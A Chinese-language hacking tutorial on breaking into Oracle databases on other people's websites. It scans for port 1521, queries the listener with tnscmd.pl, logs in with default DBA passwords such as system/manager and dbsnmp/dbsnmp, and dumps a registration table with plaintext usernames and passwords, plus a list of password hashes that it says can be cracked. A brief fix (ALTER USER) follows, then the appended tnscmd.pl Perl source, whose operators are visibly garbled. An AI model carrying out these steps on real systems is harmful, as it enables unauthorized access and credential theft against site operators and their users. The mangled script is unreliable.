Oracle數據庫是現在很流行的數據庫系統,很多大型網站都采用Oracle,它之所以倍受用戶喜愛是因為它有以下突出的特點:
1:支持大數據庫、多用戶的高性能的事務處理。Oracle支持最大數據庫,其大小可到幾百千兆,可充分利用硬件設備。支持大量用戶同時在同一數據上執行各種數據應用,并使數據爭用最小,保證數據一致性。系統維護具有高的性能,Oracle天天可連續24小時工作,正常的系統操作(后備或個別計算機系統故障)不會中斷數據庫的使用。可控制數據庫數據的可用性,可在數據庫級或在子數據庫級上控制。
2:Oracle遵守數據存取語言、操作系統、用戶接口和網絡通信協議的工業標準。所以它是一個開放系統,保護了用戶的投資。美國標準化和技術研究所(NIST)對Oracle7 SERVER進行檢驗,100%地與ANSI/ISO SQL89標準的二級相兼容。
3:實施安全性控制和完整性控制。Oracle為限制各監控數據存取提供系統可靠的安全性。Oracle實施數據完整性,為可接受的數據指定標準。
4:支持分布式數據庫和分布處理。Oracle為了充分利用計算機系統和網絡,答應將處理分為數據庫服務器和客戶應用程序,所有共享的數據治理由數據庫治理系統的計算機處理,而運行數據庫應用的工作站集中于解釋和顯示數據。通過網絡連接的計算機環境,Oracle將存放在多臺計算機上的數據組合成一個邏輯數據庫,可被全部網絡用戶存取。分布式系統像集中式數據庫一樣具有透明性和數據一致性。
具有可移植性、可兼容性和可連接性。由于Oracle軟件可在許多不同的操作系統上運行,以致Oracle上所開發的應用可移植到任何操作系統,只需很少修改或不需修改。Oracle軟件同工業標準相兼容,包括很多工業標準的操作系統,所開發應用系統可在任何操作系統上運行。可連接性是指ORALCE答應不同類型的計算機和操作系統通過網絡可共享信息。
雖然Oracle數據庫具有很高的安全性,但是假如我們在配置的時候不注重安全意識,那么也是很危險的。也就是說,安全最主要的還是要靠人自己,而不能過分依靠軟件來實現。
我們知道,在MSSQL中,安裝完成后默認有個sa的登陸密碼為空,假如不更改就會產生安全漏洞。那么oracle呢?也有的。為了安裝和調試的方便,Oracle數據庫中的兩個具有DBA權限的用戶Sys和System的缺省密碼是manager。筆者發現很多國內網站的Oracle數據庫沒有更改這兩個用戶的密碼,其中也包括很多大型的電子商務網站, 我們就可以利用這個缺省密碼去找我們感愛好的東西。如何實現,看下面的文章吧。
進行測試前我們先來了解一些相關的知識,我們連接一個Oracle數據庫的時候,需要知道它的service_name或者是Sid值,就象mssql一樣,需要知道數據庫名。那如何去知道呢,猜?呵呵,顯然是不行的。這里我們先講講oracle的TNS listener,它位于數據庫Client和數據庫Server之間,默認監聽1521端口,這個監聽端口是可以更改的。但是假如你用一個tcp的session去連接1521端口的話,oracle將不會返回它的banner,假如你輸入一些東西的話,它甚至有可能把你踢出去。這里我們就需要用tnscmd.pl這個perl程序了,它可以查詢遠程oracle數據庫是否開啟(也就是ping了),查詢版本,以及查詢它的服務名,服務狀態和數據庫服務名,而且正確率很高。
理論方面的講完了,假如還有什么不懂的可以去查找相關資料。現在開始測試吧,需要的工具有:ActivePerl,Oracle客戶端,Superscan或者是其它掃描端口的軟件, Tnscmd.pl。
我們先用Superscan掃描開放了端口1521的主機,假設其ip是xx.xx.110.110,這樣目標已經有了。然后我們要做的就是用Tnscmd.pl來查詢遠程數據庫的服務名了,Tnscmd.pl的用法如下:
C:/perl/bin>perl tnscmd.pl
usage: tnscmd.pl [command] -h hostname
where 'command' is something like ping, version, status, etc.
(default is ping)
[-p port] - alternate TCP port to use (default is 1521)
[--logfile logfile] - write raw packets to specified logfile
[--indent] - indent & outdent on parens
[--rawcmd command] - build your own CONNECT_DATA string
[--cmdsize bytes] - fake TNS command size (reveals packet leakage)
我們下面用的只有簡單的幾個命令,其他的命令也很好用,一起去發掘吧。。。。
然后我們就這樣來:
C:/perl/bin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent
sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521
writing 91 bytes
reading
._.......6.........?. ..........
DESCRIPTION=
TMP=
VSNNUM=135286784
ERR=0
SERVICES_EXIST=1
.Q........
SERVICE=
SERVICE_NAME=ORCL
INSTANCE=
INSTANCE_NAME=ORCL
NUM=1
INSTANCE_CLASS=ORACLE
HANDLER=
HANDLER_DISPLAY=DEDICATED SERVER
STA=ready
HANDLER_INFO=LOCAL SERVER
HANDLER_MAXLOAD=0
HANDLER_LOAD=0
ESTABLISHED=447278
REFUSED=0
HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227
HANDLER_NAME=DEDICATED
ADDRESS=
PROTOCOL=beq
PROGRAM=/home/oracle/bin/oracle
ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'
ARGV0=oracleORCL
ARGS='
LOCAL=NO
'
.........@
從上面得到的信息我們可以看出數據庫的服務名為ORCL,然后我們就可以通過sqlplus工具來遠程連上它了,用戶名和密碼我們用默認的system/manager或者是sys/manager,其他的如mdsys/mdsys,ctxsys/ctxsys等,這個默認用戶和密碼是隨版本的不同而改變的哦~~~~。
如下:
C:/oracle/ora90/BIN>sqlplus /nolog
SQL*Plus: Release 9.0.1.0.1 - ProdUCtion on Thu May 23 11:36:59 2002
(c) Copyright 2001 Oracle Corporation. All rights reserved.
SQL>connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=xx.xx.110.110)(port=1521)))(connect_data=(SERVICE_NAME=ORCL)));
假如密碼正確,那么就會提示connected,假如不行,再換別的默認用戶名和密碼。經過筆者的嘗試一般用dbsnmp/dbsnmp都能進去。當然假如對方已經把默認密碼改了,那我們只能換別的目標了。但是我發現很多都是不改的,這個就是安全意識的問題了。
成功連接后,這樣來
SQL>select distinct owner from all_objects;
上面是查看數據庫里面有多少用戶,是不是覺得oracle數據庫和mssql數據庫很象?提交后出現以下信息:
CTXSYS
MDSYS
DEMO
PUBLIC
SYS
SYSTEM
ORCL
...
我們需要的就是ORCL了,其他全是系統默認的,沒有什么價值,呵呵~~~~
SQL>select owner,table_name from dba_tables where owner='ORCL';
上面是查看數據表的內容了,提交后,出現以下信息:
OWNER TABLE_NAME
------------------------------ ------------------------------
ORCL MLOG$_T1
ORCL PLAN_TABLE
ORCL VODAD
ORCL VODADMIN
ORCL VODBUSI
ORCL VODFIRM
ORCL VODFIRMDETAIL
ORCL VODGROUP
ORCL VODLOG
ORCL VODSUR
......
......
ORCL REGUNITTYPE
ORCL REGUSER
....
怎么樣,發現你感愛好的沒有呢?REGUSER?用戶信息。。。。。。哈哈。然后提交如下語句:
SQL> desc ORCL.REGUSER;
Name Null? Type
----------------------------------------- -------- ----------------------------
UNAME VARCHAR2(32)
PASSWord VARCHAR2(20)
IDTYPE VARCHAR2(2)
IDNUM VARCHAR2(20)
OCCUPATION VARCHAR2(2)
BIRTHDAY DATE
USTATE NUMBER(38)
.....
是不是眼前一亮?出現了用戶名和密碼的字眼哦,那好等什么呢?提交如下語句吧:
SQL> select UNAME,PASSWORD from ORCL.REGUSER;.....
UNAME PASSWORD
---------------- --------------------
coolboy 780929
Babycat 546789
Mickey 794951
WING 357954
Badb0y 490570
abcd 161346
wwwcool 940216
UNAME PASSWORD
---------------- --------------------
killer 643059
lilymi 724811
mick 190553
Nicky 277514
.....
得到什么了?用戶名和密碼,而且是明文的!這樣我們就成功的得到了該數據庫的敏感信息了,還想干什么呢?小心為妙,呵呵。
以上的密碼是沒有加密的,假如我們碰到那些安全意識比較高的治理員的話,那結果就不一樣了,他會把默認密碼更改掉,把敏感數據加密,比如我碰到的另一個主機就是這樣的的情況了,密碼不是明文顯示的,而是進行了加密,這樣就一定程度上增強了安全性。
SQL> select user_login_name,user_password from **.**;
USER_LOGIN_NAME USER_PASSWORD
-------------------- --------------------------------------------------
admin oc1VhCpFQ2Gfv5lLgqBlJ4nj
zsq fEqNCco3Yq9h5ZUglD3CZJT4
cyc fEqNCco3Yq9h5ZUglD3CZJT4
alan igp+2MewyV3chSc/kDsfXJX4
cindy Gb5DH4d0CCITzo09E7kJ8Ty5
alice fEqNCco3Yq9h5ZUglD3CZJT4
carrie fEqNCco3Yq9h5ZUglD3CZJT4
wxm fEqNCco3Yq9h5ZUglD3CZJT4
zhangj fEqNCco3Yq9h5ZUglD3CZJT4
chengwl fEqNCco3Yq9h5ZUglD3CZJT4
peggy fEqNCco3Yq9h5ZUglD3CZJT4
那么密碼加密了是否就沒有辦法了呢?當然不是的,即使是md5加密的密碼也是可以破解的嘛。假如密碼破解不出來,我們至少也得到了用戶的ID哈。。。。
就象mssql的sa弱口令可以得到系統權限一樣,我們也可以利用這個得到主機的某些權限的,這里就不再講了,當你明白了oracle的基本命令和操作指令后自然就知道了。
上面講了這么多,那么如何來修改這個默認口令呢,這才是我們關心的問題。具體操作如下:
在SQL*DBA下鍵入:
alter user sys indentified by password;
alter user system indentified by password;
其中password為您為用戶設置的密碼。
其實就是這么簡單的幾個語句就可以把安全性提高很多。
總結:一句話,安全還是意識的問題,假如腦子里沒有安全意識,那最安全的系統也是不安全的。
附件:Tnscmd.pl
#!/usr/bin/perl
#
# tnscmd - a lame tool to prod the oracle tnslsnr process (1521/tcp)
# tested under linux x86 & OpenBSD Sparc + perl5
#
# Initial cruft: jwa@jammed.com 5 Oct 2000
#
# $Id: tnscmd,v 1.3 2001/04/26 06:45:48 jwa EXP $
#
# see also:
# http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.Html
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0818
# http://otn.oracle.com/deploy/security/alerts.htm
# http://xforce.iss.net/alerts/advise66.php
#
# GPL'd, of course. http://www.gnu.org/copyleft/gpl.html
#
# $Log: tnscmd,v $
# Revision 1.3 2001/04/26 06:45:48 jwa
# typo in url. whoops.
#
# Revision 1.2 2001/04/26 06:42:17 jwa
# complete rewrite
# - use IO::Socket instead of tcp_open
# - got rid of pdump()
# - put packet into @list and build it with pack()
# - added --indent option
#
#
use IO::Socket;
use strict; # a grumpy perl interpreter is your friend
select(STDOUT);$=1;
#
# process arguments
#
my ($cmd) = $ARGV[0] if ($ARGV[0] !~ /^-/);
my ($arg);
while ($arg = shift @ARGV) {
$main::hostname = shift @ARGV if ($arg eq "-h");
$main::port = shift @ARGV if ($arg eq "-p");
$main::logfile = shift @ARGV if ($arg eq "--logfile");
$main::fakepacketsize = shift @ARGV if ($arg eq "--packetsize");
$main::fakecmdsize = shift @ARGV if ($arg eq "--cmdsize");
$main::indent = 1 if ($arg eq "--indent");
$main::rawcmd = shift @ARGV if ($arg eq "--rawcmd");
$main::rawout = shift @ARGV if ($arg eq "--rawout");
}
if ($main::hostname eq "") {
print <<_EOF_;
usage: $0 [command] -h hostname
where 'command' is something like ping, version, status, etc.
(default is ping)
[-p port] - alternate TCP port to use (default is 1521)
[--logfile logfile] - write raw packets to specified logfile
[--indent] - indent & outdent on parens
[--rawcmd command] - build your own CONNECT_DATA string
[--cmdsize bytes] - fake TNS command size (reveals packet leakage)
_EOF_
exit(0);
}
# with no commands, default to pinging port 1521
$cmd = "ping" if ($cmd eq "");
$main::port = 1521 if ($main::port eq ""); # 1541, 1521.. DBAs are so whimsical
#
# main
#
my ($command);
if (defined($main::rawcmd))
{
$command = $main::rawcmd;
}
else
{
$command = "(CONNECT_DATA=(COMMAND=$cmd))";
}
my $response = tnscmd($command);
viewtns($response);
exit(0);
#
# build the packet, open the socket, send the packet, return the response
#
sub tnscmd
{
my ($command) = shift @_;
my ($packetlen, $cmdlen);
my ($clenH, $clenL, $plenH, $plenL);
my ($i);
print "sending $command to $main::hostname:$main::port/n";
if ($main::fakecmdsize ne "")
{
$cmdlen = $main::fakecmdsize;
print "Faking command length to $cmdlen bytes/n";
}
else
{
$cmdlen = length ($command);
}
$clenH = $cmdlen >> 8;
$clenL = $cmdlen & 0xff;
# calculate packet length
if (defined($main::fakepacketsize))
{
print "Faking packet length to $main::fakepacketsize bytes/n";
$packetlen = $main::fakepacketsize;
}
else
{
$packetlen = length($command) + 58; # "preamble" is 58 bytes
}
$plenH = $packetlen >> 8;
$plenL = $packetlen & 0xff;
$packetlen = length($command) + 58 if (defined($main::fakepacketsize));
# decimal offset
# 0: packetlen_high packetlen_low
# 26: cmdlen_high cmdlen_low
# 58: command
# the packet.
my (@packet) = (
$plenH, $plenL, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x36, 0x01, 0x2c, 0x00, 0x00, 0x08, 0x00,
0x7f, 0xff, 0x7f, 0x08, 0x00, 0x00, 0x00, 0x01,
$clenH, $clenL, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0xe6, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
);
for ($i=0;$i {
push(@packet, ord(substr($command, $i, 1)));
}
my ($sendbuf) = pack("C*", @packet);
print "connect ";
my ($tns_sock) = IO::Socket::INET->new(
PeerAddr => $main::hostname,
PeerPort => $main::port,
Proto => 'tcp',
Type => SOCK_STREAM,
Timeout => 30) die "connect to $main::hostname failure: $!";
$tns_sock->autoflush(1);
print "/rwriting " . length($sendbuf) . " bytes/n";
if (defined($main::logfile))
{
open(SEND, ">$main::logfile.send") die "can't write $main::logfile.send: $!";
print SEND $sendbuf die "write to logfile failed: $!";
close(SEND);
}
my ($count) = syswrite($tns_sock, $sendbuf, length($sendbuf));
if ($count != length($sendbuf))
{
print "only wrote $count bytes?!";
exit 1;
}
print "reading/n";
# get fun data
# 1st 12 bytes have some meaning which so far eludes me
if (defined($main::logfile))
{
open(REC, ">$main::logfile.rec") die "can't write $main::logfile.rec: $!";
}
my ($buf, $recvbuf);
# read until socket EOF
while (sysread($tns_sock, $buf, 128))
{
print REC $buf if (defined($main::logfile));
$recvbuf .= $buf;
}
close (REC) if (defined($main::logfile));
close ($tns_sock);
return $recvbuf;
}
sub viewtns
{
my ($response) = shift @_;
# should have a hexdump option . . .
if ($main::raw)
{
print $response;
}
else
{
$response =~ tr//200-/377//000-/177/; # strip high bits
$response =~ tr//000-/027//./;
$response =~ tr//177//./;
if ($main::indent)
{
parenify($response);
}
else
{
print $response;
}
print "/n";
}
}
sub parenify
{
my ($buf) = shift @_;
my ($i, $c);
my ($indent, $o_indent);
for ($i=0;$i {
$c = substr($buf, $i, 1);
$indent++ if ($c eq "(");
$indent-- if ($c eq ")");
if ($indent != $o_indent)
{
print "/n" unless(substr($buf, $i+1, 1) eq "(");
print " " x $indent;
$o_indent = $indent;
undef $c;
}
print $c;
}
}
